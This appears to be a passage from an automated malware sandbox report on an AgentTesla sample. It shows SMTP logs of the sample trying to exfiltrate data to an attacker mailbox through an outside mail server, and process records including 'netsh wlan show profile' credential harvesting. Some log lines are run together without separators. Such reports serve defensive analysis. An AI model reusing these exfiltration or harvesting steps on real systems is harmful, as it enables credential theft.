Jan 14, 2021 03:38:53.492810011 CET | 587 | 49770 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:38:53.493453026 CET | 49770 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:38:53.668452024 CET | 587 | 49770 | 208.91.198.143 | 192.168.2.4 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Jan 14, 2021 03:38:53.668843031 CET | 49770 | 587 | 192.168.2.4 | 208.91.198.143 | AUTH login bndhbWFAYnVsa2xvZ3MudG9w
Jan 14, 2021 03:38:53.844468117 CET | 587 | 49770 | 208.91.198.143 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Jan 14, 2021 03:38:55.350706100 CET | 587 | 49770 | 208.91.198.143 | 192.168.2.4 | 535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
Jan 14, 2021 03:38:55.351398945 CET | 49770 | 587 | 192.168.2.4 | 208.91.198.143 | MAIL FROM:<nwama@bulklogs.top>
Jan 14, 2021 03:38:55.527075052 CET | 587 | 49770 | 208.91.198.143 | 192.168.2.4 | 250 2.1.0 Ok
Jan 14, 2021 03:38:55.529506922 CET | 49770 | 587 | 192.168.2.4 | 208.91.198.143 | RCPT TO:<nwama@bulklogs.top>
Jan 14, 2021 03:38:55.709355116 CET | 587 | 49770 | 208.91.198.143 | 192.168.2.4 | 554 5.7.1 <nwama@bulklogs.top>: Relay access denied
Jan 14, 2021 03:40:19.719785929 CET | 587 | 49773 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:40:19.720010042 CET | 49773 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
Jan 14, 2021 03:40:19.720334053 CET | 587 | 49772 | 208.91.198.143 | 192.168.2.4 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2021 03:40:19.720499039 CET | 49772 | 587 | 192.168.2.4 | 208.91.198.143 | EHLO 445817
                                                                                          Jan 14, 2021 03:40:19.748115063 CET58749774208.91.198.143192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Jan 14, 2021 03:40:19.748383045 CET49774587192.168.2.4208.91.198.143EHLO 445817
                                                                                          Jan 14, 2021 03:40:19.892843008 CET58749773208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:40:19.893080950 CET49773587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:40:19.894793987 CET58749772208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:40:19.894994974 CET49772587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:40:19.922291040 CET58749774208.91.198.143192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250 DSN
                                                                                          Jan 14, 2021 03:40:19.922487020 CET49774587192.168.2.4208.91.198.143AUTH login bndhbWFAYnVsa2xvZ3MudG9w
                                                                                          Jan 14, 2021 03:40:20.066808939 CET58749773208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:20.070353985 CET58749772208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:20.097296000 CET58749774208.91.198.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.473912954 CET58749773208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.474267006 CET58749772208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.524705887 CET58749774208.91.198.143192.168.2.4535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                          Jan 14, 2021 03:40:22.652414083 CET49772587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.652452946 CET49774587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.652458906 CET49773587192.168.2.4208.91.198.143MAIL FROM:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.826167107 CET58749773208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:40:22.827114105 CET58749774208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:40:22.827848911 CET58749772208.91.198.143192.168.2.4250 2.1.0 Ok
                                                                                          Jan 14, 2021 03:40:22.828411102 CET49773587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.828443050 CET49774587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:22.828445911 CET49772587192.168.2.4208.91.198.143RCPT TO:<nwama@bulklogs.top>
                                                                                          Jan 14, 2021 03:40:23.006000042 CET58749773208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:40:23.006797075 CET58749774208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied
                                                                                          Jan 14, 2021 03:40:23.007632017 CET58749772208.91.198.143192.168.2.4554 5.7.1 <nwama@bulklogs.top>: Relay access denied

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 03:37:36
Start date: 14/01/2021
Path: C:\Users\user\Desktop\sample2.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\sample2.exe'
Imagebase: 0x590000
File size: 608768 bytes
MD5 hash: B0F2D519CCAE5BF1435264E0979770CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.661861944.0000000003D5A000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 03:37:43
Start date: 14/01/2021
Path: C:\Users\user\Desktop\sample2.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xee0000
File size: 608768 bytes
MD5 hash: B0F2D519CCAE5BF1435264E0979770CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.987520387.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.996293991.0000000003865000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.992160350.0000000003704000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 03:38:07
Start date: 14/01/2021
Path: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
Imagebase: 0x7c0000
File size: 608768 bytes
MD5 hash: B0F2D519CCAE5BF1435264E0979770CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.721770177.0000000003F4A000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 30%, Metadefender
• Detection: 81%, ReversingLabs
Reputation: low

General

Start time: 03:38:09
Start date: 14/01/2021
Path: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xae0000
File size: 608768 bytes
MD5 hash: B0F2D519CCAE5BF1435264E0979770CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.996705258.0000000003454000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.987543673.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.993193122.00000000032F8000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 03:38:15
Start date: 14/01/2021
Path: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\nwama\nwama.exe'
Imagebase: 0x8d0000
File size: 608768 bytes
MD5 hash: B0F2D519CCAE5BF1435264E0979770CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.737377613.000000000416B000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 03:38:16
Start date: 14/01/2021
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: 'netsh' wlan show profile
Imagebase: 0x9f0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:38:16
Start date: 14/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:38:18
Start date: 14/01/2021
Path: C:\Users\user\AppData\Local\Temp\nwama\nwama.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0x520000
File size: 608768 bytes
MD5 hash: B0F2D519CCAE5BF1435264E0979770CE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.991842162.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.991287271.0000000002C14000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.987505021.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 03:38:40
Start date: 14/01/2021
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: 'netsh' wlan show profile
Imagebase: 0x9f0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:38:40
Start date: 14/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:38:47
Start date: 14/01/2021
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: 'netsh' wlan show profile
Imagebase: 0x9f0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 03:38:47
Start date: 14/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis